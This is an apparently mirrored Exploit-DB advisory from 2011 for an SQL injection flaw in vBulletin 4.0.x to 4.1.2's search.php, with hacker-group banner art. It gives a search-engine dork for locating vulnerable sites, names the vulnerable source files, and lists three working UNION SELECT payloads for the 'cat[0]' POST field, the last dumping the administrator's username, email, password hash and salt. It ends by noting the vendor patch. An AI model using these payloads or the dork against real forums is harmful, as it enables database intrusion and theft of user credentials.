vBulletin 4.0.x 4.1.2 – ‘search.php’ SQL Injection - 体验盒子

作者： D4rkB1t

日期： 2011-05-23

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/17314/

====================================================================
#vBulletin4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
##
# 888 d8888 _ 888,d d8 #
#e88~\888d88 888-~\ 888 e~ ~888-~88e,d888 _d88__ #
# d888888 d888 888888d8b888888b 888888 #
# 8888888/ 888 888888Y88b 8888888 888888 #
# Y888888 /__888__ 888888 Y88b888888P 888888 #
#"88_/888888 888888Y88b 888-_88"888"88_/ #
##
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By : D4rkB1t
#[+] Site: NaN
#[+] support e-mail: d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
#~Advice~#
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================